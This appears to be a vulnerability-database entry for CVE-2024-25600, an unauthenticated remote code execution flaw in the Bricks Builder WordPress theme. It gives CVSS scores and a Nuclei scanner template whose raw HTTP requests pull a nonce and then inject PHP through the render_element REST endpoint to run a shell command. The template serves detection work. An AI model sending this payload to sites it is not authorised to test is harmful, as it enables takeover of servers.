10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.9 High
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
48.2%
Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities
id: CVE-2024-25600
info:
name: Unauthenticated Remote Code Execution – Bricks <= 1.9.6
author: christbowel
severity: critical
description: |
Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
- https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/
- https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
- https://github.com/Chocapikk/CVE-2024-25600
- https://op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation
metadata:
verified: true
max-request: 2
publicwww-query: "/wp-content/themes/bricks/"
tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rce
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"postId": "1",
"nonce": "{{nonce}}",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "Exception:"
- "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- 'nonce":"([0-9a-z]+)'
internal: true
# digest: 4a0a00473045022100a5bd80c7b1b78947e5625bc99d789dda7abab3a15d72d576e5e041a07373107702200f34940f17f5cb59266839d45826cad4832c7a1cb63955dd87d2ae154c68c50e:922c64590222798bb761d5b6d8e72950
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
github.com/Chocapikk/CVE-2024-25600
op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation
snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.9 High
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
48.2%